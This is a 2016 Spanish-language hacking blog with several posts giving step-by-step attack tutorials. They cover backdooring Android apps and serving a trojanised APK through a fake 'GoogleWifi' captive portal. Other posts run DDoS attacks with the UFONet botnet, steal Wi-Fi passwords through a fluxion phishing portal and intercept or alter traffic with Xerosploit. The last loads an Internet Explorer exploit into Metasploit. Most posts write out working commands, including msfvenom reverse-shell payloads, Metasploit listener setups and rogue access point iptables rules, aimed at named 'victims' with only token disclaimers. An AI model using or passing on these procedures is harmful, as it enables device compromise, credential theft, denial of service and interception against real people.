viernes, 23 de diciembre de 2016

Infectar una app fácil

Hola amigos:

Hace unos posts, hablábamos de cómo inyectar un payload de android en una app, y lo hacíamos a mano.

En esta ocasión, vamos a presentar un script que nos lo automatizará. Este script se llama backdoor-apk y lo descargamos de https://github.com/dana-at-cp/backdoor-apk

Lo descomprimimos

unzip backdoor-apk-master.zip

Nos vamos al directorio /backdoor-apk-master/backdoor-apk

Copiamos la app víctima dentro de este mismo directorio.

Y Ejecutamos:

./backdoor-apk.sh <app_victima>

Ojo, es importante poner en el mismo directorio de backdoor-apk.sh la app objetivo, pues si no, nos dará un error.

Y completamos lo que nos piden (tipo de payload, IP local y puerto de destino).





La app infectada la podremos encontrar en el subdirectorio /original/dist/

Podemos iniciar metasploit preparadito para escuchar el payload con

msfconsole -r backdoor-apk.rc






Para borrar los archivos generados y poder volver a usar el script:

./cleanup.sh.

Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
  • Facebook: facebook.com/Manugomez1977
  • Twitter: @manugomez1977
  • Instagram: @MANUGOMEZ1977
Me gustaría agradeceros vuestras visitas, vuestras dudas y vuestro apoyo que he tenido en estos 12 meses de vida del blog. Intentaré seguir posteando y, por supuesto, seguir aprendiendo (que me queda mucho todavía).

Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.

Felices fiestas y ¡¡¡ Happy Hacking !!!


jueves, 15 de diciembre de 2016

Portal cautivo con troyano

En primer lugar, creamos el payload

msfvenom -p android/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=4895 -o meterpreter.apk



Si queremos, crearemos una aplicación falsa que supuestamente nos dé conexión internet. Infectamos la aplicación GoogleWifi tal y como vimos en el post http://manugomez1977.blogspot.com.es/2016/10/infectando-apk.html

Creamos una página web parecida a la que sigue a continuación




Lo copiaremos todo en una carpeta llamada, por ejemplo GoogleWifi, dentro de /var/www/

editamos 000-default.conf y añadimos



Editamos el archivo /etc/apache2/ports.conf y añadimos



Editamos el archivo /etc/apache2/sites-available/000-default.conf y añadimos



Editamos /etc/apache2/sites-enabled/000-default.conf y añadimos (si no ya está relleno, porque a veces se rellena automáticamente)



Iniciamos el servidor apache

service apache2 start

Creamos un AP falso (si tenéis alguna duda, consultad el post:
http://manugomez1977.blogspot.com.es/2016/06/crear-una-red-wifi-falsa.html) de la siguiente manera (en mi caso, wlan0 da internet y wlan1 es la red falsa):

En una terminal ponemos:

ifconfig wlan1 up
airmon-ng start wlan1
airbase-ng -c 1 -e GoogleWifi wlan1

En otra terminal:ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-port 55555
iptables -t nat -I PREROUTING -p tcp --dport 4895 -j ACCEPT
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0



En otra terminal, abrimos metasploit:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST 10.0.0.1
set LPORT 4895
exploit

Cuando la víctima abra la app:




Se iniciará meterpreter, en ese momento, abriremos una nueva terminal y ponemos:
iptables -t nat -I PREROUTING -s <ip_victima> -p tcp -j ACCEPT
iptables -t nat -A PREROUTING -s <ip_victima> -p tcp -j ACCEPT


Para darle así internet.










viernes, 9 de diciembre de 2016

Ddos con UFONET

Ufonet es una botnet para ataques DoS, que utiliza servidores vulnerables para realizar el ataque.

Nos descargamos Ufonet de:




Descomprimimos

unzip ufonet-master.zip

accedemos a la carpeta ufonet-master



Debemos tener instalado Python 2.x.e instalar las dependencias (si es que no las tenemos ya instaladas)

apt-get install python (posiblemente ya lo tengáis instalado).

apt-get install python-pycurl python-geoip



El modo de usarlo es el siguiente (es la salida de ./ufonet -h)

Usage: UFONet.py [options]

 UFONet - DDoS Botnet via Web Abuse - by psy

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')
Es aconsejable iniciar el servicio tor y privoxy.

En primer lugar, descargamos y actualizamos zombies:

./ufonet --proxy=http://127.0.0.1:8118 --download-zombies



Contestamos que sí (y)



./ufonet --proxy=http://127.0.0.1:8118 --upload-zombies

Para buscar zombies:

./ufonet --d dorks.txt

Acto seguido, nos pedirá si queremos actualizar nuestra base de datos de zombies, a lo cual diremos que sí.

Recomiendo no hacer esto último con proxys, porque puede dar error.

Para realizar el ataque debemos poner

./ufonet --proxy=http://127.0.0.1:8118 -a <direccion victima con http:// o con https:// incluído>

Si queremos, podemos usar la Gui:

./ufonet --gui





Editando el archivo dorks.txt y añadiendo más dorks, podremos buscar posbiles zombies




IMPORTANTE: No cometáis delitos.

Sígueme:
  • Twitter: @manugomez1977
  • Instagram: MANGOMEZ1977
  • Facebook: facebook.com/Mangomez1977

viernes, 2 de diciembre de 2016

Sacando contraseñas wifi con fluxion

Hola a todos.

En este post vamos a ver cómo podemos sacar la contraseña wifi de una víctima a través de ingeniería social.

La idea es bloquear a la víctima de su propia red wifi, para crear nosotros otra con el mismo nombre, de tal modo que se conecte a nosotros. Cuando esto pase, no podrá navegar, pidiéndole la contraseña wifi por motivos de seguridad, con lo que la víctima, la ingresará y le volveremos a dar su propia señal wifi.

Para ello, Nos descargamos fluxion de https://github.com/deltaxflux/fluxion



Descomprimimos



Instalamos

./Installer



Una vez instalado

./fluxion



Seleccionamos el idioma

y el canal




Cuando acabemos, cerramos la ventana.



Seleccionamos la red a atacar



Seleccionaré 1



Seleccionamos la interfaz. Elegiré 1





Seleccionamos idioma del login, y saldrán varias ventanas que no debes cerrar.



La víctima se ha conectado, sin embargo, no le conecta. Le aparece una página que dice que debe  introducir la contraseña.



Cuando la víctima meta la contraseña:



Como hemos visto anteriormente, captura el handshake. Esto es debido a que, si la víctima no introduce la contraseña correcta, fluxion lo detecta y le vuelve a pedir la misma.

No utilices este conocimiento para fines ilegales.

Sígueme:
  • twitter: @manugomez1977
  • instagram: MANUGOMEZ1977
  • facebook: Manugomez1977

viernes, 25 de noviembre de 2016

Xerosploit, un framework para ataques mitm

Hola amigos,

Hoy os traigo un framework para ataques MITM, que es capaz de hacer:
  • Escaneo de puertos
  • Mapeo de red.
  • Ataques DOS.
  • Inyección HTML
  • Inyección JAVA
  • Interceptación y sustitución de descargas.
  • Snifar tráfico.
  • DNS spoofing.
  • Reproducción de audio de fondo.
  • Reemplazamiento de imágenes.
  • Etc.
Nos lo podemos descargar de la página https://github.com/LionSec/xerosploit



Una vez descargado descomprimimos

unzip xerosploit-master.zip



./install.py



Elegimos la instalación. Como lo voy a instalar en Kali, pulso 1; sin embargo, si lo fuese a instalar en parrot OS (que por cierto, también está muy bien), sería la 2.





Para ejecutar, ponemos

xerosploit

Si damos a help, nos muestra los comandos disponibles




Si ponemos scan



Ponemos la IP víctima



Nos pregunta que qué módulo queremos cargar. Para ello nos dice que pongamos help para ver los mismos.

help

Los módulos que tiene son:

  • pscan: Escanea puertos.
  • dos: Ataque DOS.
  • ping: Pues eso.
  • Injecthtml: Inyecta código html.
  • injectjs: Inyecta javascript.
  • rdownload: reemplaza ficheros que están siendo descargados.
  • sniff: Esnifea los paquetes.
  • dspoof: Redirige todo el tráfico http a una determinada IP.
  • yplay: Reproduce en segundo plano un sonido en el navegador víctima.
  • move: mueve el contenido del navegador web. Es como si alguien del más allá estuviese moviendo la barra de desplazamiento.
  • deface: Reescribe todas las páginas con tu propio código.
  • driftnet: Capturamos las imágenes que le lleguen.
  • replace: Reemplaza las imágenes de una página web por la que tú quieras.

Pondremos el nombre del módulo y presionamos intro.

Cuando acabemos, pulsamos CTRL+C

Y para volver hacia atrás, ponemos back

Por ejemplo, si ponemos

replace

run

Ponemos el directorio de la imagen que queremos inyectar.

Y el resultado es el siguiente: Cuando vaya, por ejemplo, a la web http://www.perpetuosocorro.org/ , en lugar de ver:


Verá:



Por supuesto, que sólo la página le sale así a la víctima, en ningún momento se sustituye nada en la página web original.

Para salir,

exit

Happy hacking !!!!!!!!!!

No me hago responsable del mal uso de esta herramienta.

Sígueme en twitter: @manugomez1977 instagram: manugomez1977 Facebook:facebook.com/Manugomez1977

Para poder seguir haciendo posts, es necesario que hagas click en la publi. No te cuesta nada.


viernes, 18 de noviembre de 2016

Cómo buscar exploits

Hola Amigos.

En este post vamos a ver cómo podemos conseguir exploits que no están en nuestro metasploit.

En primer lugar, nos vamos a la web de exploitdb https://www.exploit-db.com



Tenemos la opción de buscar los tipos de exploit.



En el apartado shellcode nos encontramos las shells para los distintos S.O.



Podemos ver también distintos papers sobre seguridad, en la opción con el mismo nombre.



Con la opción Google Hacking Database podemos buscar dorks para google.



Vamos a usar el siguiente exploit remoto para android




Como podéis ver, tenemos el código CVE-2016-3861. Los códigos CVE identifican cada una de las vulnerabilidades de manera única, así podemos buscar una vulnerabilidad concreta con su respectivo código CVE.

El código CVE está compuesto de CVE-AÑO_DESCUBRIMIENTO-Nº_IDENTIFICATIVO



En la pestaña buscar, podemos buscar exploits concretos,, vamos a buscar exploits para windows 7.



Si no queremos demostrar que no somos robots con los captchas, nos podemos descargar la aplicación actualizada (aunque ya la tiene kali, pero es mejor descargarla) de



Esta versión se actualiza cada semana, para ello, hay que actualizarla:

./searchsploit -u

Con la opción -w nos muestra los exploits de la página exploitdb con su respectivo enlace

Cada uno de los exploits están en su código fuente, por lo que, tras descargarlos, habría que compilarlos si fuese necesario.

Para evitar que los script kiddies que se creen que los saben todo hagan el tonto con los exploits, los desarrolladores suelen poner errores en el código, así que lo más seguro es que haya que editarlo y corregirlo, y por supuesto, compilarlo.

En algunos casos, si están en ruby, podemos añadirlos a metasploit.

Nos descargamos el siguiente exploit


Una vez descargados

mv 28682.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

Daos cuenta que el directorio principal de metasploit es /usr/share/metasploit-framework/.

En metasploit lo cargaríamos como siempre

use exploit/windows/browser/ie_setmousecapture_uaf

set SRVHOST 192.168.1.134

set SSL true

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.134

exploit

Sígueme en mis redes sociales:
  • facebook: facebook.com/Manugomez1977
  • twitter manugomez1977
  • instagram: manugomez1977

Por favor, haz click en la publi para poder seguir subiendo posts.

Muchas gracias.